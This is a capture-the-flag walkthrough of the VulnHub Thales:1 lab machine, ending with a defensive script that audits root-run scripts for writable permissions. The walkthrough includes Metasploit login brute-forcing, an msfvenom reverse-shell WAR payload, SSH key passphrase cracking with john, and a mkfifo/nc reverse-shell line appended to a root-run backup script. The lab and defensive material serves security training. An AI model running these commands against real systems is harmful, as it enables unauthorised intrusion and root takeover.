[vulnhub range] thales:1
2022-07-07 16:24:00 【Nailaoyyds】
Preface
Description
Brief introduction: open your eyes and look from another angle
Contains 2 flags: user.txt and root.txt.
Download link
https://download.vulnhub.com/thales/Thales.zip.torrent
0x00 Environment
Kali: 192.168.56.102
Thales target machine: 192.168.56.101
1. Information gathering
0x00 arp-scan
arp-scan -I eth1 -l # scan the LAN on interface eth1
0x01 nmap scan
The scan found hosts on two network segments. Not sure which one is the target, so scan both IPs with nmap.
Open ports: 22 and 8080
Visiting the site requires a username and password.
2. Exploitation
0x00 Using msfconsole
Search msf for the tomcat login module
Configure the payload
Username tomcat, password role1
Login succeeded
0x01 File upload
Looking through the functionality, an upload point was found
Use Kali to generate a WAR file trojan for a reverse shell:
msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.56.102 lport=5555 -f war -o myshell.war
Upload succeeded, then run it
3. Privilege escalation
0x00 Reverse shell
Listen on the port
Upgrade to an interactive shell
sudo -l # requires a password, which is unknown
Found the user Thales under the home directory
The file `notes.txt` mentions `/usr/local/bin/backup.sh`; view the file contents
0x02 Dictionary attack
Found the .ssh folder
The private key can be converted with ssh2john.py into a hash file for cracking
Use ssh2john.py
Run the script against the private key
/usr/share/john/ssh2john.py id_rsa > crack.txt
john --wordlist=/usr/share/wordlists/rockyou.txt crack.txt
Cracked password: vodka06
Switch user
0x03 user.txt
View user.txt, the first flag
notes.txt is owned by root; there may be something useful inside
0x04 Reverse shell
Notice that backup.sh has execute permission, so a reverse shell can be written into it
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 666 >/tmp/f" >> backup.sh
Editing the file content directly would replace it, so append instead
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.102 9999 >/tmp/f" >> backup.sh
0x05 root.txt
Listen on 9999; after writing, the connection comes in by itself
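The escalation above works because a script that runs with root privileges can be modified by a non-root user. The following is an added example, not part of the original write-up: a defender-side audit for that misconfiguration. The function names are hypothetical, and it assumes the script is run by a root-owned job, as the callback arriving on its own implies.

```shell
#!/bin/sh
# Added example: audit scripts that a privileged job executes.
# Usage: sh audit.sh /usr/local/bin/backup.sh [more paths...]

# True (exit 0) when group or others hold write permission on $1.
loose_mode() {
    [ -n "$(find "$1" -prune \( -perm -0020 -o -perm -0002 \) -print 2>/dev/null)" ]
}

# Numeric owner uid of $1 (third field of `ls -ldn`).
owner_uid() {
    ls -ldn "$1" | awk '{print $3}'
}

# Print one finding per weakness.
# Returns 0 when clean, 1 when something was found, 2 when the path is missing.
audit_root_script() {
    script=$1
    rc=0
    if [ ! -e "$script" ]; then
        echo "MISSING  $script"
        return 2
    fi
    if [ "$(owner_uid "$script")" != "0" ]; then
        echo "OWNER    $script is owned by uid $(owner_uid "$script"), not root"
        rc=1
    fi
    if loose_mode "$script"; then
        echo "WRITABLE $script can be modified by group or others"
        rc=1
    fi
    # A writable parent directory lets a user replace the script outright.
    dir=$(dirname "$script")
    if loose_mode "$dir"; then
        echo "PARENT   $dir is writable by group or others"
        rc=1
    fi
    return $rc
}

# Audit every path given on the command line.
for p in "$@"; do
    audit_root_script "$p" || true
done
```

Any finding on a path that root executes should be fixed with root ownership and mode 755 or stricter on both the script and its directory.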
Summary
What Thales taught:
Using msf with a brute-force dictionary
Using an encrypted RSA private key